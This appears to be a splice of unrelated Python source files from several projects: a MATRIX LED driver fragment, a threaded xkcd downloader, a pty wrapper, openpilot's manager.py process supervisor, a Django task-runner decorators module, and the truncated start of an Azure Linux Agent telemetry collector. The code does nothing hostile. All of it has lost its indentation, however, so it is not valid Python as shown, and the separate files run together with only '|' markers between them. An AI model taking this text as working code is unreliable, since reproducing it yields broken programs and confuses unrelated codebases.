# Create a new driver config
driver_config_proto = driver_pb2.DriverConfig()
# Create an empty Everloop image
image = []
# For each device LED
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 10
ledValue.red = 10
ledValue.green = 10
ledValue.white = 0
image.append(ledValue)
# Store the Everloop image in driver configuration
driver_config_proto.image.led.extend(image)
# Send driver configuration through ZMQ socket
socket.send(driver_config_proto.SerializeToString())
flag=False
if __name__ == "__main__":
# Initiate asynchronous events
ioloop.install()
# Start Error Port connection
Process(target=register_error_callback, args=(everloop_error_callback, matrix_ip, everloop_port)).start()
# Ping the Keep-alive Port once
ping_socket()
# Start Data Update Port connection & close after response
update_socket()
# Send Base Port configuration
try:
config_socket(led_count)
# Avoid logging Everloop errors on user quiting
except KeyboardInterrupt:
print(' quit')
|
multidownloadXkcd.py
|
#! python3
# multidownloadXkcd.py - Downloads XKCD comics using multiple threads.
import requests, os, bs4, threading
os.makedirs('xkcd', exist_ok=True) # store comics in ./xkcd
def downloadXkcd(startComic, endComic):
for urlNumber in range(startComic, endComic):
# Download the page.
print('Downloading page http://xkcd.com/%s...' % (urlNumber))
res = requests.get('http://xkcd.com/%s' % (urlNumber))
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text)
# Find the URL of the comic image.
comicElem = soup.select('#comic img')
if comicElem == []:
print('Could not find comic image.')
else:
comicUrl = comicElem[0].get('src')
# Download the image.
print('Downloading image %s...' % (comicUrl))
res = requests.get(comicUrl)
res.raise_for_status()
# Save the image to ./xkcd
imageFile = open(os.path.join('xkcd', os.path.basename(comicUrl)), 'wb')
for chunk in res.iter_content(100000):
imageFile.write(chunk)
imageFile.close()
# Create and start the Thread objects.
downloadThreads = [] # a list of all the Thread objects
for i in range(0, 1400, 100): # loops 14 times, creates 14 threads
downloadThread = threading.Thread(target=downloadXkcd, args=(i, i + 99))
downloadThreads.append(downloadThread)
downloadThread.start()
# Wait for all threads to end.
for downloadThread in downloadThreads:
downloadThread.join()
print('Done.')
|
run_silent_if_successful.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import pty
import signal
import subprocess
import sys
import threading
master_pty_fd, slave_pty_fd = pty.openpty()
read_data = []
def master_pty_fd_reader():
while True:
try:
data = os.read(master_pty_fd, 1024)
except OSError:
return
else:
if data:
read_data.append(data)
else:
return
master_pty_fd_reader_thread = threading.Thread(target=master_pty_fd_reader)
master_pty_fd_reader_thread.start()
pid = None
def handler(signal_number, frame):
if not pid:
return
os.kill(pid, signal_number)
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGHUP, handler)
try:
popen = subprocess.Popen(
sys.argv[1:],
stdin=subprocess.DEVNULL,
stdout=slave_pty_fd,
stderr=slave_pty_fd,
)
except FileNotFoundError as e:
print(str(e), file=sys.stderr)
os.close(slave_pty_fd)
master_pty_fd_reader_thread.join()
sys.exit(127)
pid = popen.pid
returncode = popen.wait()
os.close(slave_pty_fd)
master_pty_fd_reader_thread.join()
if returncode:
for data in read_data:
os.write(sys.stdout.fileno(), data)
sys.exit(returncode)
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1040
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if __name__ != "__main__":
spinner.close()
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes \
# result in a weird snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /sdcard/unkillable_reboot")
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
decorators.py
|
import logging, functools, time, os
from functools import wraps
from functools import partial
from ratelimit.decorators import ratelimit
from django.conf import settings
from django.http import Http404
from django.shortcuts import redirect
from django.contrib import messages
import sys
logger = logging.getLogger('engine')
import threading
def is_moderator(f):
def inner(request, **kwargs):
user = request.user
if user.is_authenticated and user.profile.is_moderator:
return f(request, **kwargs)
messages.warning(request, "You need to be a moderator to perform this action.")
return redirect('/')
return inner
def reset_count(key):
"""
Set value of given key in settings.SESSION_COUNT_KEY to 0.
"""
session_key = settings.SESSION_COUNT_KEY
def outer(func):
@wraps(func)
def inner(request, **kwargs):
# Get the count from sessions
counts = request.session.get(session_key, {})
counts[key] = 0
request.session[session_key] = counts
return func(request, **kwargs)
return inner
return outer
def check_params(allowed):
"""
Validate if only allowed params are present in request.GET.
"""
def outter(func):
@wraps(func)
def inner(request, **kwargs):
incoming = set(request.GET.keys())
# Expected parameter names.
diff = incoming - allowed
if diff:
logger.error(f"invalid get request parameters {diff}")
raise Http404("Parameter does not exist.")
return func(request, **kwargs)
return inner
return outter
def limited(key, rate):
"""
Make a blocking rate limiter that does not raise an exception
"""
def outer(func):
@ratelimit(key=key, rate=rate)
def inner(request, **kwargs):
was_limited = getattr(request, 'limited', False)
if was_limited:
msg = "Too many requests from same IP address. Temporary ban."
messages.warning(request, msg)
raise Http404(msg)
return func(request, **kwargs)
return inner
return outer
def timeit(func):
"""
Print how long function takes.
"""
@wraps(func)
def inner(*args, **kwargs):
start = time.time()
val = func(*args, **kwargs)
delta = int((time.time() - start) * 1000)
msg = f"time={delta}ms for {func.__name__}"
if delta > 1000:
msg = f'SLOW: {msg}'
logger.info(msg)
else:
logger.debug(msg)
return val
return inner
def check_lock(lock):
"""
Check if lock directory exists before calling function
"""
def __inner(func):
def __wrapper(*args, **kwargs):
if os.path.isdir(lock):
logger.warning('Lock directory detected, function is already running')
sys.exit()
# Try to run function
try:
# Make the lock directory
os.makedirs(lock, exist_ok=True)
out = func(*args, **kwargs)
except Exception as exc:
logger.error(exc)
out = None
finally:
# Clean the locks.
os.rmdir(lock)
# Return function output
return out
return __wrapper
return __inner
def d_timer():
"""
Return disabled timer.
"""
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
def __call__(self, f, *args, **kwargs):
pass
return inner
def b_timer():
"""
Return blocking timer
"""
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
def __call__(self, func, *args, **kwargs):
func(*args, **kwargs)
return inner
def t_timer():
"""
Return threaded timer
"""
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
def __call__(self, func, *args, **kwargs):
# The loop repeats the timer.
def loop():
ticker = threading.Event()
while not ticker.wait(self.secs):
func(*args, **kwargs)
# Run process in separate thread, once.
logger.info(f"new time thread for function f{func} {args} {kwargs}")
t = threading.Thread(target=loop, daemon=True)
t.start()
return inner
def u_timer():
"""
Return uwsgi timer
"""
from uwsgidecorators import timer
return timer
def c_timer():
"""
Construct a celery timer decorator.
Inside the __call__, it dynamically adds the given function to the beat schedule.
Adopted from:
https://docs.celeryproject.org/en/master/userguide/periodic-tasks.html#beat-entries
"""
from biostar.celery import app
class inner(object):
def __init__(self, secs, **kwargs):
self.secs = secs
# Handler means that not to evaluate the app at module level when calling f()
# on_after_finalize
@app.on_after_configure.connect
def __call__(self, f, *args, **kwargs):
f = app.task(f)
# Add the entry to the beat_schedule.
app.add_periodic_task(schedule=self.secs,
sig=f,
kwargs=kwargs,
args=args,
name=f.__name__)
return inner
def thread(*args, **kwargs):
"""
Return a threaded worker
"""
def outer(func, **kwargs):
@functools.wraps(func)
def inner(*args, **kwargs):
# Run process in separate thread.
logger.debug(f"new thread for function f{func} {args} {kwargs}")
t = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
t.start()
# Gains an attribute called spool that runs the function in the background.
inner.spool = inner
inner.delay = inner
return inner
return outer
def u_worker():
"""
Return a uwsgi spooler compatible with celery interface
"""
# Ensure uwsgi is installed.
from uwsgidecorators import spool
def inner(f):
"""
Alias to call .spool when calling .delay
@spooler
def job(foo):
pass
# Uwsgi type of launch
job.spool(foo='')
# Celery type of launch
job.delay(foo='')
"""
worker = spool(pass_arguments=True)(f)
# Compatible with celery interface.
worker.delay = worker.spool
return worker
return inner
def c_worker():
"""
Return a celery worker compatible with uwsgi interface
"""
from biostar.celery import app
def inner(f):
"""
Alias to call .delay when calling .spool
@spooler
def job(foo):
pass
# Uwsgi type of launch
job.spool(foo='')
# Celery type of launch
job.delay(foo='')
"""
worker = app.task(f)
# Compatible with uwsgi interface.
worker.spool = worker.delay
return worker
return inner
def b_worker():
"""
Return a blocking decorator that runs the function once.
"""
def outer(func, *args, **kwargs):
@functools.wraps(func)
def inner(*args, **kwargs):
logger.debug(f"running f{func} {args} {kwargs}")
return func(*args, **kwargs)
inner.spool = inner
inner.delay = inner
return inner
return outer
def d_worker():
"""
Return a d_worker decorator that does nothing
"""
def outer(func, *args, **kwargs):
@functools.wraps(func)
def inner(*args, **kwargs):
pass
inner.spool = inner
inner.delay = inner
return inner
return outer
def t_worker():
"""
Wrap a threaded worker and to match interface.
"""
def inner(f):
worker = thread()(f)
return worker
return inner
def select_runner(name):
"""
Return runner based on name ( worker or timer ) and settings.TASK_RUNNER.
"""
mapper = {
'block': {'worker': b_worker, 'timer': b_timer},
'uwsgi': {'worker': u_worker, 'timer': u_timer},
'celery': {'worker': c_worker, 'timer': c_timer},
'threaded': {'worker': t_worker, 'timer': t_timer},
'disable': {'worker': d_worker, 'timer': d_timer},
}
if settings.TASK_RUNNER not in mapper:
logger.error(f"Invalid Task. valid options : {mapper.keys()}")
raise Exception('Invalid task.')
# Call primary function here and return worker decorator.
decorator = mapper.get(settings.TASK_RUNNER)[name]()
return decorator
try:
# Initiate the runners
WORKER = select_runner('worker')
TIMER = select_runner('timer')
logger.debug(f'workers and timers set to {settings.TASK_RUNNER}')
except Exception as exc:
# Disable tasks when there are errors, raising exceptions breaks migration.
WORKER = d_worker()
TIMER = d_timer()
logger.error(f'Error initializing task: {settings.TASK_RUNNER}.')
logger.error(f'Tasks disabled: {exc}.')
def task(f):
"""
Utility function to access worker decorator.
"""
return WORKER(f)
def timer(f):
"""
Utility function to access timer decorator.
"""
return TIMER(f)
|
collect_telemetry_events.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
import traceback
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.agent_supported_feature import get_supported_feature_by_name, SupportedFeatureNames
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger, \
CollectOrReportEventDebugInfo, EVENT_FILE_REGEX, parse_event
from azurelinuxagent.common.exception import InvalidExtensionEventError, ServiceStoppedError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema, GuestAgentExtensionEventsSchema
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_telemetry_events_handler(send_telemetry_events_handler):
return CollectTelemetryEventsHandler(send_telemetry_events_handler)
class ExtensionEventSchema(object):
"""
Class for defining the schema for Extension Events.
Sample Extension Event Example:
{
"Version":"1.0.0.23",
"Timestamp":"2018-01-02T22:08:12.510696Z" //(time in UTC (ISO-8601 standard),
"TaskName":"TestRun" //Open for publishers,
"EventLevel":"Critical/Error/Warning/Verbose/Informational/LogAlways",
"Message": "Successful test" //(max 3K, 3072 characters),
"EventPid":"1",
"EventTid":"2",
"OperationId":"Guid (str)"
}
"""
Version = "Version"
Timestamp = "Timestamp"
TaskName = "TaskName"
EventLevel = "EventLevel"
Message = "Message"
EventPid = "EventPid"
EventTid = "EventTid"
OperationId = "OperationId"
class _ProcessExtensionEvents(PeriodicOperation):
"""
Periodic operation for collecting extension telemetry events and enqueueing them for the SendTelemetryHandler thread.
"""
_EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=5)
_EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
# Limits
_MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
_EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024 # 4 MB = 4 * 1,048,576 Bytes
_EXTENSION_EVENT_MAX_SIZE = 1024 * 6 # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
_EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3 # 3Kb or 3072 chars.
_EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
def __init__(self, send_telemetry_events_handler):
super(_ProcessExtensionEvents, self).__init__(_ProcessExtensionEvents._EXTENSION_EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping current iteration".format(
self._send_telemetry_events_handler.get_thread_name()))
return
delete_all_event_files = True
extension_handler_with_event_dirs = []
try:
extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
if not extension_handler_with_event_dirs:
logger.verbose("No Extension events directory exist")
return
for extension_handler_with_event_dir in extension_handler_with_event_dirs:
handler_name = extension_handler_with_event_dir[0]
handler_event_dir_path = extension_handler_with_event_dir[1]
self._capture_extension_events(handler_name, handler_event_dir_path)
except ServiceStoppedError:
# Since the service stopped, we should not delete the extension files and retry sending them whenever
# the telemetry service comes back up
delete_all_event_files = False
except Exception as error:
msg = "Unknown error occurred when trying to collect extension events. Error: {0}, Stack: {1}".format(
ustr(error), traceback.format_exc())
add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
finally:
# Always ensure that the events directory are being deleted each run except when Telemetry Service is stopped,
# even if we run into an error and dont process them this run.
if delete_all_event_files:
self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
"""
Get the full path to events directory for all extension handlers that have one
:param extension_log_dir: Base log directory for all extensions
:return: A list of full paths of existing events directory for all handlers
"""
extension_handler_with_event_dirs = []
for ext_handler_name in os.listdir(extension_log_dir):
# Check if its an Extension directory
if not os.path.isdir(os.path.join(extension_log_dir, ext_handler_name)) \
or re.match(HANDLER_NAME_PATTERN, ext_handler_name) is None:
continue
# Check if EVENTS_DIRECTORY directory exists
extension_event_dir = os.path.join(extension_log_dir, ext_handler_name, EVENTS_DIRECTORY)
if os.path.exists(extension_event_dir):
extension_handler_with_event_dirs.append((ext_handler_name, extension_event_dir))
return extension_handler_with_event_dirs
def _event_file_size_allowed(self, event_file_path):
event_file_size = os.stat(event_file_path).st_size
if event_file_size > self._EXTENSION_EVENT_FILE_MAX_SIZE:
convert_to_mb = lambda x: (1.0 * x) / (1000 * 1000)
msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
event_file_path, convert_to_mb(event_file_size),
convert_to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
return False
return True
def _capture_extension_events(self, handler_name, handler_event_dir_path):
"""
Capture Extension events and add them to the events_list
:param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
:param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
"""
